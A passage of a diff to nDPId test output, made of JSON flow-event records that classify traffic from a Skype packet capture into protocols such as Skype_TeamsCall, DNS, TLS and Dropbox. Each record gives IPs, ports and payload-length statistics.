+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687262,"flow_last_seen":1431970707409,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"83.31.12.173","src_port":13021,"dst_port":23939,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.42","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.43","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970679995,"flow_last_seen":1431970679995,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.29","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649778,"flow_last_seen":1431970649778,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.25","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970683987,"flow_last_seen":1431970683987,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.17","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":165,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970669927,"flow_last_seen":1431970669927,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970670941,"flow_last_seen":1431970670941,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.40","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970648822,"flow_last_seen":1431970648822,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.19","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970657867,"flow_last_seen":1431970657867,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.13","src_port":13021,"dst_port":40021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.39","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970658879,"flow_last_seen":1431970658879,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.16","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659834,"flow_last_seen":1431970659834,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.20","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634729,"flow_last_seen":1431970661287,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00611{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970687670,"flow_last_seen":1431970706351,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51289,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970635489,"flow_last_seen":1431970690062,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":2405,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00614{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00599{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1431970688781,"flow_last_seen":1431970693454,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2900,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":51292,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634276,"flow_last_seen":1431970660781,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970634276,"flow_last_seen":1431970660781,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55028,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1431970690191,"flow_last_seen":1431970705014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51295,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970636044,"flow_last_seen":1431970646741,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":1,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694737,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00612{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00596{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970701508,"flow_last_seen":1431970702603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":323,"flow_tot_l4_payload_len":719,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -1016,120 +1019,120 @@ 00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970691351,"flow_last_seen":1431970701913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00598{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431970685839,"flow_last_seen":1431970687668,"flow_idle_time":140000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648979,"flow_last_seen":1431970679027,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 